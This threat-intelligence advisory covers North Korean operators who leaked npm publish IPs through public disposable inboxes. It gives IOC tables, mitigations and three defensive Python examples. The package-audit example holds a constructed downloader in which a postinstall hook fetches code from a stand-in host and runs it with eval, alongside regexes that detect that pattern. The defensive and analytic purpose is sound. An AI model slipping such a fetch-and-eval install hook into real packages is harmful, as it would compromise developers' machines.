Affected ecosystem: npm registry and developer tooling supply chain
Primary issue: OPSEC leakage from disposable email inbox exposure combined with npm publish notification metadata
Exploitation status: Observed in the wild (malicious npm packages published by the actor); technique leveraged by researcher for intelligence collection
Confidence: High
Sectors at risk: Software development, open source ecosystems, CI/CD pipelines
Regions at risk: Global
Publication context: New report (KMSEC OPSEC-3)
Executive Summary
KMSEC has detailed how operators attributed to the North Korean group FAMOUS CHOLLIMA exposed operational IP addresses while publishing malicious packages to the npm registry. The actors used disposable email services with publicly accessible inboxes to register accounts. Because npm sends a notification email containing the publisher’s IP address upon each publish event, viewing these mailboxes revealed consistent exit node IPs over time.
This OPSEC lapse provides defenders with repeatable infrastructure artefacts for clustering activity, enriching alerts and improving platform abuse detection. KMSEC also observed the same disposable mailboxes receiving sign-up notifications from recruitment platforms, reinforcing links to the broader “Contagious Interview” campaign.
Context
FAMOUS CHOLLIMA, also tracked as Contagious Interview (MITRE ATT&CK group G1052), PurpleBravo and other designations, has conducted ongoing operations since at least 2023. The group targets software developers through fake job offers and technical interviews, often delivering malware via malicious code projects or compromised dependencies.
Public reporting from CrowdStrike, Recorded Future and GitLab consistently describes the group’s use of social engineering and supply chain vectors to achieve both financial gain and espionage objectives.
Technical Analysis
npm notification metadata and public mailbox exposure
When a package is published to npm, the service sends an email to the registered address that includes the IP address from which the publish request originated. Several temporary email providers used by the operators allow anyone who knows the address to view the inbox contents via a simple web URL.
KMSEC recovered multiple publishing IPs this way, including exit nodes from Astrill VPN and hide.me services. One example involves the package chai-status (version 2.4.2), published on 18 November 2025 by the account [email protected]. The package is a downloader that retrieves an additional payload from jsonkeeper.com and executes it through JavaScript evaluation. Viewing the corresponding temporary mailbox revealed the IP 216.227.145.218, assessed as an Astrill VPN exit.
Consistent infrastructure usage
Publishing activity observed between September 2025 and late January 2026 showed the same IPs recurring over weeks and months. This pattern indicates a stable preference for particular anonymisation services and enables longitudinal tracking and correlation.
A smaller number of IPs resolved to ISP space (including China Unicom and TransTeleCom) rather than commercial VPN providers. Because these are not shared commercial exits they are potentially higher-signal artefacts, but they warrant careful enrichment before being relied on.
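The following is an added example (not KMSEC's tooling) of the collection step described in the two sections above: parse publish notices out of a mailbox, group them by source IP, and compute first/last seen so that reused exits show up over time. The notice wording matched by PUBLISH_RE is an assumption modelled on npm's publish emails, not a verbatim copy, so tune it to the mail you actually hold; the IP attributions are taken from this report's IOC table, and SAMPLE_NOTICES are constructed, not real mailbox captures.

```python
"""Recover npm publish source IPs from notification emails and cluster them over time.

Added example, not KMSEC's tooling. PUBLISH_RE is an assumed notice shape, not
npm's exact template; SAMPLE_NOTICES are constructed, not real captures.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import date

# Assumed notice shape: "<name>@<version> was published ... from IP address <ip>".
PUBLISH_RE = re.compile(
    r"(?P<name>[@\w./-]+)@(?P<version>\d+\.\d+\.\d+\S*)\s+was published.*?"
    r"IP address\s+(?P<ip>(?:\d{1,3}\.){3}\d{1,3})",
    re.S,
)
DATE_RE = re.compile(r"^Date:\s*(\d{4}-\d{2}-\d{2})", re.M)

# Publish IPs and attributions as listed in the report's IOC table (exact IPs, no ranges).
KNOWN_IPS = {
    "216.227.145.218": ("vpn", "Astrill VPN"),
    "67.43.59.10": ("vpn", "Astrill VPN"),
    "193.118.55.19": ("vpn", "hide.me VPN"),
    "193.118.55.77": ("vpn", "hide.me VPN"),
    "203.160.80.72": ("isp", "China Unicom"),
    "62.33.223.164": ("isp", "TransTeleCom"),
}


@dataclass(frozen=True)
class Publish:
    when: date
    name: str
    version: str
    ip: str


def parse_notice(raw: str):
    """Return a Publish for an npm publish notice, or None for any other mail."""
    body, header = PUBLISH_RE.search(raw), DATE_RE.search(raw)
    if not (body and header):
        return None
    return Publish(date.fromisoformat(header.group(1)),
                   body.group("name"), body.group("version"), body.group("ip"))


def classify(ip: str):
    """Label an IP from the report's table; anything else is unattributed."""
    return KNOWN_IPS.get(ip, ("unknown", "unattributed"))


def cluster_by_ip(notices):
    """Group publishes per source IP with first/last seen, to expose reused exits."""
    by_ip = defaultdict(list)
    for raw in notices:
        pub = parse_notice(raw)
        if pub:
            by_ip[pub.ip].append(pub)
    clusters = {}
    for ip, pubs in by_ip.items():
        pubs.sort(key=lambda p: p.when)
        kind, owner = classify(ip)
        clusters[ip] = {
            "kind": kind,
            "owner": owner,
            "first_seen": pubs[0].when,
            "last_seen": pubs[-1].when,
            "span_days": (pubs[-1].when - pubs[0].when).days,
            "packages": sorted({f"{p.name}@{p.version}" for p in pubs}),
            # ISP space is not a shared commercial exit, so it deserves priority enrichment.
            "high_signal": kind == "isp",
        }
    return clusters


# Constructed sample mailbox; only the first entry reuses a package named in the report.
SAMPLE_NOTICES = [
    "Date: 2025-11-18\nSubject: Successfully published chai-status@2.4.2\n\n"
    "chai-status@2.4.2 was published to the npm registry from IP address 216.227.145.218.\n",
    "Date: 2025-12-02\nSubject: Successfully published example-helper@1.0.3\n\n"
    "example-helper@1.0.3 was published to the npm registry from IP address 216.227.145.218.\n",
    "Date: 2026-01-09\nSubject: Successfully published example-helper@1.0.4\n\n"
    "example-helper@1.0.4 was published to the npm registry from IP address 203.160.80.72.\n",
    "Date: 2025-09-30\nSubject: Welcome to our newsletter\n\nNo publish data here.\n",
]

if __name__ == "__main__":
    for ip, info in sorted(cluster_by_ip(SAMPLE_NOTICES).items()):
        flag = " <- high signal" if info["high_signal"] else ""
        print(f"{ip} {info['owner']} {info['first_seen']}..{info['last_seen']} "
              f"({info['span_days']}d) {info['packages']}{flag}")
```

Feeding real notices in is a matter of replacing SAMPLE_NOTICES with the raw messages pulled from the mailbox; the span_days field is what turns a single IP hit into the longitudinal signal the report relies on, and the high_signal flag surfaces ISP-space exits for enrichment ahead of the commercial VPN ones.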
Shared temporary email infrastructure
KMSEC identified multiple disposable email domains whose mail infrastructure resolves to shared backend hosts. Several services appear to be reskins of the same platform, with common SMTP banners and infrastructure IPs such as 91.196.52.205. This cluster (including generator.email, emailfake.com and tempm.com) was heavily used by the operators.
The author recommends platform operators perform MX record lookups and infrastructure fingerprinting rather than relying solely on domain blocklists.
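As an added example of the MX-based check recommended above (this is not KMSEC's or npm's code), the block below groups sign-up domains by the IP behind their MX hosts and gates a registration on that backend rather than on the domain name alone, so a freshly registered reskin of the same platform is caught. DNS resolution is injected so it runs offline against a constructed fixture; in production pass a function backed by a real resolver (for instance dnspython's dns.resolver.resolve(name, "MX") and (name, "A")). The MX hostnames and the domain fresh-reskin.example are invented; 91.196.52.205 and the three disposable-mail domains are the ones named in the report.

```python
"""Fingerprint sign-up email domains by their MX backend, not by domain name alone.

Added example (not KMSEC's or npm's code). Resolution is injected; FIXTURE is a
constructed stand-in for DNS with invented MX hostnames.
"""
from collections import defaultdict

# Constructed fixture: (name, record type) -> records.
FIXTURE = {
    ("generator.email", "MX"): ["mx.generator.email"],
    ("emailfake.com", "MX"): ["mx.emailfake.com"],
    ("tempm.com", "MX"): ["mail.tempm.com"],
    ("fresh-reskin.example", "MX"): ["mx.fresh-reskin.example"],  # not on any blocklist yet
    ("example.org", "MX"): ["mx.example.org"],                    # control: unrelated provider
    ("mx.generator.email", "A"): ["91.196.52.205"],
    ("mx.emailfake.com", "A"): ["91.196.52.205"],
    ("mail.tempm.com", "A"): ["91.196.52.205"],
    ("mx.fresh-reskin.example", "A"): ["91.196.52.205"],
    ("mx.example.org", "A"): ["198.51.100.10"],  # RFC 5737 documentation range
}

DOMAIN_BLOCKLIST = {"generator.email", "emailfake.com", "tempm.com"}
BACKEND_BLOCKLIST = {"91.196.52.205"}


def fixture_resolver(name: str, rrtype: str):
    """Stand-in for a DNS lookup; returns [] for unknown names, like NXDOMAIN."""
    return FIXTURE.get((name.lower().rstrip("."), rrtype), [])


def mx_backends(domain: str, resolve) -> set:
    """IPs behind a domain's mail exchangers (empty when nothing can receive mail)."""
    # RFC 5321 implicit MX: with no MX record, mail goes to the domain's own A record.
    hosts = resolve(domain, "MX") or [domain]
    ips = set()
    for host in hosts:
        ips.update(resolve(host, "A"))
    return ips


def cluster_by_backend(domains, resolve):
    """Map each backend IP to the domains whose mail resolves to it."""
    clusters = defaultdict(set)
    for domain in domains:
        for ip in mx_backends(domain, resolve):
            clusters[ip].add(domain)
    return {ip: sorted(doms) for ip, doms in clusters.items()}


def signup_verdict(email: str, resolve) -> str:
    """Sign-up gate: domain blocklist first, then the MX backend, then missing MX."""
    domain = email.rsplit("@", 1)[-1].lower()
    if domain in DOMAIN_BLOCKLIST:
        return "blocked-domain"
    backends = mx_backends(domain, resolve)
    if not backends:
        return "no-mx"            # cannot receive mail at all
    if backends & BACKEND_BLOCKLIST:
        return "blocked-backend"  # reskin of a known disposable service
    return "ok"


if __name__ == "__main__":
    domains = ["generator.email", "emailfake.com", "tempm.com",
               "fresh-reskin.example", "example.org"]
    for ip, doms in cluster_by_backend(domains, fixture_resolver).items():
        print(ip, doms)
    for addr in ["a@tempm.com", "b@fresh-reskin.example", "c@example.org", "d@nonexistent.invalid"]:
        print(addr, signup_verdict(addr, fixture_resolver))
```

The point of the fixture is the fresh-reskin.example entry: it is on no domain blocklist, yet its MX resolves to the same backend as the known services, so the backend check catches it while a name-only check would not. Note the implicit-MX fallback; a domain with no MX record is still deliverable via its A record, so treating "no MX" as "disposable" without that fallback would produce false positives.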
Overlap with recruitment activity
Disposable mailboxes used for npm publishing also received registration confirmations from hiring platforms such as bayt.com and HireLatam. This supports existing assessments that the same infrastructure and personas are used across supply chain attacks and fake recruitment operations.
Impact Assessment
Successful compromise through malicious npm packages can lead to credential theft, token exposure and downstream supply chain incidents. The additional telemetry from KMSEC’s research strengthens defenders’ ability to detect and disrupt these operations earlier in the kill chain.
Indicators of Compromise
VPN and proxy IPs should be treated as pivot points for correlation rather than definitive attribution. The following are representative examples reported by KMSEC.
| Type | Value | Context / Notes | Source | Confidence |
|---|---|---|---|---|
| IPv4 | 216.227.145.218 | npm publish IP recovered from public mailbox (Astrill VPN) | KMSEC OPSEC-3 | High |
| IPv4 | 193.118.55.19 | npm publish IP (hide.me VPN) | KMSEC OPSEC-3 | Medium |
| IPv4 | 193.118.55.77 | npm publish IP (hide.me VPN) | KMSEC OPSEC-3 | Medium |
| IPv4 | 67.43.59.10 | npm publish IP (Astrill VPN) | KMSEC OPSEC-3 | Medium |
| IPv4 | 203.160.80.72 | npm publish IP (China Unicom) | KMSEC OPSEC-3 | Medium |
| IPv4 | 62.33.223.164 | npm publish IP (TransTeleCom) | KMSEC OPSEC-3 | Medium |
| IPv4 | 91.196.52.205 | Shared backend infrastructure for multiple temp mail services | KMSEC OPSEC-3 | High |
Threat Intelligence Context and ATT&CK Mapping
| Tactic | Technique | Name | Observed |
|---|---|---|---|
| Initial Access | T1566.003 | Spearphishing via Service | Recruitment lures and platform abuse |
| Initial Access | T1195.001 | Compromise Software Dependencies and Development Tools | Malicious npm packages |
| Execution | T1059.007 | JavaScript | Downloader payloads in published packages |
| Command and Control | T1090 | Proxy | VPN usage for operational security |
Mitigation Recommendations
For platform operators:
- Implement MX record and backend IP checks for sign-ups to detect disposable email infrastructure.
- Consider additional verification steps for accounts using known temporary mail services.
- Monitor for rapid or patterned publishing behaviour from new accounts.
For organisations:
- Enforce dependency pinning and lockfiles.
- Disable or restrict postinstall script execution in CI/CD environments where possible.
- Monitor npm audit logs and egress traffic from build systems for suspicious domains.
- Train developers on risks associated with unverified packages and interview-based lures.
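To make the second and third organisational recommendations concrete, the following added example (not KMSEC's tooling and not an npm feature) audits an unpacked package before installation: it lists lifecycle scripts (the hooks that run on install), flags JavaScript that fetches remote content and passes it to eval, new Function or vm, and reports any egress host not on an allowlist. The package is handled as a mapping of relative path to file text so the audit runs offline; load_package() builds that mapping from an unpacked tarball. The two sample packages are constructed: the downloader imitates the behaviour the report describes (fetch a remote blob, execute it with eval) but is not the real chai-status code, and payload.example is an invented host.

```python
"""Pre-install audit of an npm package: lifecycle scripts, fetch-then-eval, egress hosts.

Added example, not KMSEC's tooling and not an npm feature. DOWNLOADER_PKG and
CLEAN_PKG are constructed samples; payload.example is an invented host.
"""
import json
import re
from pathlib import Path

LIFECYCLE = ("preinstall", "install", "postinstall", "prepare")
FETCH_RE = re.compile(r"\b(?:https?\.(?:get|request)|fetch|axios\.(?:get|post))\s*\(")
EVAL_RE = re.compile(r"\beval\s*\(|new\s+Function\s*\(|vm\.runIn(?:This|New)Context\s*\(")
HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")


def load_package(root):
    """Read package.json and every .js/.cjs/.mjs file under an unpacked package."""
    root = Path(root)
    files = {}
    for path in root.rglob("*"):
        if path.is_file() and (path.name == "package.json" or path.suffix in (".js", ".cjs", ".mjs")):
            files[str(path.relative_to(root))] = path.read_text(errors="replace")
    return files


def audit(files, allowed_hosts=frozenset()):
    """Return findings as dicts; an empty list means nothing looked suspicious."""
    findings = []
    manifest = json.loads(files.get("package.json", "{}"))
    for hook, cmd in manifest.get("scripts", {}).items():
        if hook in LIFECYCLE:
            findings.append({"kind": "lifecycle-script", "where": hook, "detail": cmd})
    for path, text in files.items():
        if path == "package.json":
            continue
        # A network fetch and a dynamic-code sink in the same file is the downloader shape.
        if FETCH_RE.search(text) and EVAL_RE.search(text):
            findings.append({"kind": "fetch-and-eval", "where": path,
                             "detail": "remote content reaches eval/new Function/vm"})
        for host in sorted(set(HOST_RE.findall(text))):
            if host not in allowed_hosts:
                findings.append({"kind": "egress-host", "where": path, "detail": host})
    return findings


# Constructed samples (not real packages).
DOWNLOADER_PKG = {
    "package.json": json.dumps({"name": "demo-downloader", "version": "0.0.1",
                                "scripts": {"postinstall": "node setup.js"}}),
    "setup.js": (
        "const https = require('https');\n"
        "https.get('https://payload.example/blob.json', res => {\n"
        "  let body = '';\n"
        "  res.on('data', c => body += c);\n"
        "  res.on('end', () => eval(body));\n"
        "});\n"
    ),
}
CLEAN_PKG = {
    "package.json": json.dumps({"name": "demo-clean", "version": "1.0.0",
                                "scripts": {"test": "node test.js"}}),
    "index.js": "module.exports = (x) => x + 1;\n",
}

ALLOWED = frozenset({"registry.npmjs.org"})

if __name__ == "__main__":
    for name, pkg in (("demo-downloader", DOWNLOADER_PKG), ("demo-clean", CLEAN_PKG)):
        for f in audit(pkg, ALLOWED) or [{"kind": "clean", "where": "-", "detail": "-"}]:
            print(f"{name}: {f['kind']} @ {f['where']}: {f['detail']}")
```

This is a heuristic triage pass, not a verdict: a lifecycle script is legitimate in many packages, and obfuscated downloaders will not match the regexes. Its value is as a gate in CI before `npm ci` runs with scripts enabled, surfacing the install-time hook plus the fetch-and-eval pattern together, which is exactly the combination the report describes for the malicious package.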
Further Reading
- KMSEC: Tracking DPRK operator IPs over time (OPSEC-3)
- MITRE ATT&CK: Contagious Interview (G1052)
- GitLab Threat Intelligence: North Korean tradecraft report
- Recorded Future: PurpleBravo targeting of the IT software supply chain
- CrowdStrike: FAMOUS CHOLLIMA adversary profile
- FAMOUS CHOLLIMA: DPRK employment fraud and developer-lure intrusion set – TIR
- DPRK fake interview lures and recruitment-driven access operations summary – TIR

